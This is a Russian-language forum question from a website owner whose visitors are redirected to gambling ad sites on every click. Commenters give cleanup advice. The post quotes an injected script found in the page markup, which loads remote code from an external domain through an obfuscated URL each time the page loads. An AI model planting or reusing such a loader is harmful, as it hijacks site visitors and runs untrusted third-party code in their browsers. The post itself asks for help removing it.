# При любом нажатии на сайте перекидывает на рекламные сайты. Как это убрать?

Tags: javascript, html, браузер, вирусы, реклама

При заходе на сайт не со всех браузеров, при нажатии на что-либо перекидывает на рекламные сайты по типу (parimatch, favbet и т.д.).
Я так понимаю, что какой-то вирусняк... Где можно это найти и почистить?
В разметке нашел странный скрипт. Не может ли он на это влиять? Если нет, то что именно может?
Ни разу с этим не сталкивался... вот и сижу ломаю голову...
Проблема именно с сайтом, а не с моим браузером. Многие клиенты жалуются, что на сайте такое происходит.

```
<script>
    window.RS_MODULES = window.RS_MODULES || {};
    window.RS_MODULES.modules = window.RS_MODULES.modules || {};
    window.RS_MODULES.waiting = window.RS_MODULES.waiting || [];
    window.RS_MODULES.defered = false;
    window.RS_MODULES.moduleWaiting = window.RS_MODULES.moduleWaiting || {};
    window.RS_MODULES.type = 'compiled';
</script>   
<script>
(function(__htas){
var d = document,
    s = d.createElement('script'),
    l = d.scripts[d.scripts.length - 1];
s.settings = __htas || {};
s.src = "\/\/altruisticcost.com\/c\/D.9D6\/bA2D5hlJSnWaQf9AN\/DsEP0\/MCTdgo2cN-i\/0\/0oM\/T\/Q\/xoOsDJYX3v";
l.parentNode.insertBefore(s, l);
})({})
</script>
```

Comment: в расширениях/дополнениях в браузере не смотрели? может там что-то есть?

Comment: проблема не только у меня, а у многих пользователей сайта

Comment: Какую-то CMS используете? Если да, то какую? Скорее всего вы давно не обновляли платформу или плагины.

Comment: Удалите скрипт и посмотрите на результат. В любом случае Вам нужно найти дыру, через которую его установили.